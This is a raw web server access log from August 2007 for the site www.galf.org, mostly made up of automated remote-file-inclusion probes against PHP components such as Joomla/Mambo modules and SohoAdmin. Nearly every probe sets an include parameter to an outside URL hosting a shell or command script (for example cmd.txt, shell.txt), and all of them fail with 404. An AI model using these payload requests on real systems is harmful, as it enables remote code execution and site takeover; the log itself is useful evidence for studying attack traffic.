67.159.30.67 - - [20/Aug/2007:01:10:05 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.228 - - [20/Aug/2007:01:11:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.228 - - [20/Aug/2007:01:11:00 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:01:11:44 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:01:11:45 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.159.30.67 - - [20/Aug/2007:01:13:08 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.159.30.67 - - [20/Aug/2007:01:13:09 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.242.236.217 - - [20/Aug/2007:01:15:21 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/xpejuang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.18.27 - - [20/Aug/2007:01:15:24 -0700] "GET /logs/access_070730.log//oneadmin/newspublish/include.php?path[docroot]=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.66.194.5 - - [20/Aug/2007:01:16:58 -0700] "GET /logs/access.log HTTP/1.1" 200 101701 "-" "Googlebot-Image/1.0" "www.galf.org"
62.75.193.80 - - [20/Aug/2007:01:17:35 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.242.236.217 - - [20/Aug/2007:01:19:34 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/xpejuang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.242.236.217 - - [20/Aug/2007:01:19:53 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/xpejuang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:01:20:46 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.67.245.245 - - [20/Aug/2007:01:21:19 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.17 - - [20/Aug/2007:01:21:20 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.17 - - [20/Aug/2007:01:21:21 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.241.214.48 - - [20/Aug/2007:01:21:59 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.214.48 - - [20/Aug/2007:01:21:59 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.56.66 - - [20/Aug/2007:01:25:17 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.56.66 - - [20/Aug/2007:01:25:17 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.55.168.7 - - [20/Aug/2007:01:25:19 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.qesaleswest.com/images/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.55.168.7 - - [20/Aug/2007:01:25:19 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.qesaleswest.com/images/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.199.227.210 - - [20/Aug/2007:01:25:27 -0700] "GET /logs/ncludehttp://www.j-vision.co.kr/tmp/rhe.ganteng? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.199.227.210 - - [20/Aug/2007:01:25:32 -0700] "GET /ncludehttp://www.j-vision.co.kr/tmp/rhe.ganteng? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:01:26:59 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:01:27:28 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:01:27:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.24.37 - - [20/Aug/2007:01:28:08 -0700] "GET /logs/access_070319.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.216.253.180 - - [20/Aug/2007:01:28:14 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.253.180 - - [20/Aug/2007:01:28:14 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.10.128.248 - - [20/Aug/2007:01:28:48 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [20/Aug/2007:01:28:48 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:01:29:06 -0700] "GET /logs/access_070806.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:01:29:06 -0700] "GET /logs/access_070730.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:01:29:18 -0700] "GET /logs/index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:01:29:18 -0700] "GET /index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:01:30:02 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:01:30:03 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.56.66 - - [20/Aug/2007:01:30:43 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.56.66 - - [20/Aug/2007:01:30:43 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.40.192.101 - - [20/Aug/2007:01:30:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.40.192.101 - - [20/Aug/2007:01:30:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:01:30:54 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:01:30:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.9.152.180 - - [20/Aug/2007:01:32:19 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.56.66 - - [20/Aug/2007:01:33:41 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.56.66 - - [20/Aug/2007:01:33:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.56.66 - - [20/Aug/2007:01:34:57 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.93.56.66 - - [20/Aug/2007:01:34:57 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.66.194.5 - - [20/Aug/2007:01:38:17 -0700] "GET /logs/access.log HTTP/1.1" 200 110725 "-" "Googlebot-Image/1.0" "www.galf.org"
87.106.103.209 - - [20/Aug/2007:01:39:35 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.103.209 - - [20/Aug/2007:01:39:36 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.193.80 - - [20/Aug/2007:01:41:37 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [20/Aug/2007:01:41:37 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:01:43:21 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:01:43:23 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.47.36.4 - - [20/Aug/2007:01:47:30 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.47.36.4 - - [20/Aug/2007:01:47:31 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.10.128.248 - - [20/Aug/2007:01:48:41 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [20/Aug/2007:01:48:42 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.18.27 - - [20/Aug/2007:01:48:56 -0700] "GET /logs/access_070806.log//oneadmin/newspublish/include.php?path[docroot]=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.193.80 - - [20/Aug/2007:01:51:06 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [20/Aug/2007:01:51:07 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.66.194.5 - - [20/Aug/2007:01:51:50 -0700] "GET /logs/access.log HTTP/1.1" 200 113705 "-" "Googlebot-Image/1.0" "www.galf.org"
66.240.226.178 - - [20/Aug/2007:01:52:07 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://chireo.info/n00gr00d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.90.8.66 - - [20/Aug/2007:01:54:26 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
77.90.8.66 - - [20/Aug/2007:01:54:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.77.225 - - [20/Aug/2007:01:54:29 -0700] "GET //oneadmin/newspublish/include.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.77.225 - - [20/Aug/2007:01:54:29 -0700] "GET //oneadmin/newspublish/include.php?path[docroot]=http://jodoh-crew.org/cmdmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.23.13 - - [20/Aug/2007:01:54:48 -0700] "GET /labia/?S=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.27.46 - - [20/Aug/2007:01:55:26 -0700] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.241.214.57 - - [20/Aug/2007:02:00:21 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.188.197.8 - - [20/Aug/2007:02:00:54 -0700] "GET /logs/index.php?id=http://www.apnic.net/index.html? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.188.197.8 - - [20/Aug/2007:02:00:54 -0700] "GET /index.php?id=http://www.apnic.net/index.html? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
212.241.214.69 - - [20/Aug/2007:02:05:17 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.66.194.5 - - [20/Aug/2007:02:05:47 -0700] "GET /logs/access.log HTTP/1.1" 200 116065 "-" "Googlebot-Image/1.0" "www.galf.org"
70.84.4.50 - - [20/Aug/2007:02:09:00 -0700] "GET /logs/template.php?pagina=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.4.50 - - [20/Aug/2007:02:09:00 -0700] "GET /template.php?pagina=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
210.200.180.227 - - [20/Aug/2007:02:09:17 -0700] "GET /index2.php?content=http://freewebs.com/pacarminus/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [20/Aug/2007:02:09:22 -0700] "GET /index2.php?content=http://freewebs.com/pacarminus/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.200.180.227 - - [20/Aug/2007:02:09:30 -0700] "GET /index2.php?content=http://freewebs.com/pacarminus/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.27.177.1 - - [20/Aug/2007:02:12:09 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.214.57 - - [20/Aug/2007:02:19:21 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
216.22.48.204 - - [20/Aug/2007:02:19:23 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:02:19:25 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.214.57 - - [20/Aug/2007:02:20:22 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.90.8.66 - - [20/Aug/2007:02:21:37 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.90.8.66 - - [20/Aug/2007:02:21:37 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.90.8.66 - - [20/Aug/2007:02:21:37 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.90.8.66 - - [20/Aug/2007:02:22:07 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
77.90.8.66 - - [20/Aug/2007:02:22:08 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.90.8.66 - - [20/Aug/2007:02:22:08 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:02:22:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.168.228.204 - - [20/Aug/2007:02:24:42 -0700] "GET /logs/template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.168.228.204 - - [20/Aug/2007:02:24:42 -0700] "GET /template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
66.251.193.115 - - [20/Aug/2007:02:25:30 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.crotz.tk/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.251.193.115 - - [20/Aug/2007:02:25:31 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.crotz.tk/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.214.69 - - [20/Aug/2007:02:25:32 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.118.104.180 - - [20/Aug/2007:02:25:40 -0700] "GET /logs/access_070806.log/http://eliairva.altervista.org/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.118.104.180 - - [20/Aug/2007:02:25:40 -0700] "GET /http://eliairva.altervista.org/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.180 - - [20/Aug/2007:02:25:40 -0700] "GET /logs/http://eliairva.altervista.org/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.180 - - [20/Aug/2007:02:25:41 -0700] "GET /logs/access_070730.log/http://eliairva.altervista.org/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:25:54 -0700] "GET /logs/template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:25:54 -0700] "GET /template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:26:00 -0700] "GET /logs/access_070730.log/template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:26:01 -0700] "GET /logs/access_070730.log/template.php?pagina=ftp://194.78.119.139/SW-Stealingboard/pics/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:26:01 -0700] "GET /template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:26:01 -0700] "GET /template.php?pagina=ftp://194.78.119.139/SW-Stealingboard/pics/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:26:02 -0700] "GET /logs/template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
81.169.157.122 - - [20/Aug/2007:02:26:02 -0700] "GET /logs/template.php?pagina=ftp://194.78.119.139/SW-Stealingboard/pics/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:26:02 -0700] "GET /logs/access_070723.log/template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:26:03 -0700] "GET /logs/access_070723.log/template.php?pagina=ftp://194.78.119.139/SW-Stealingboard/pics/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:26:10 -0700] "GET /logs/template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:26:10 -0700] "GET /template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
212.241.214.69 - - [20/Aug/2007:02:26:17 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.100.206.151 - - [20/Aug/2007:02:27:21 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://indir.savsak.com/shell.txt? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; Synapse)" "www.galf.org"
89.111.176.68 - - [20/Aug/2007:02:28:03 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.68 - - [20/Aug/2007:02:28:03 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:28:17 -0700] "GET /logs/template.php?pagina=ftp://194.78.119.139/SW-Stealingboard/pics/smile02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:28:17 -0700] "GET /template.php?pagina=ftp://194.78.119.139/SW-Stealingboard/pics/smile02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
61.152.158.46 - - [20/Aug/2007:02:29:04 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
61.152.158.46 - - [20/Aug/2007:02:29:05 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.210.236.221 - - [20/Aug/2007:02:29:34 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/bajingan_cintah/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.211.196.5 - - [20/Aug/2007:02:29:47 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
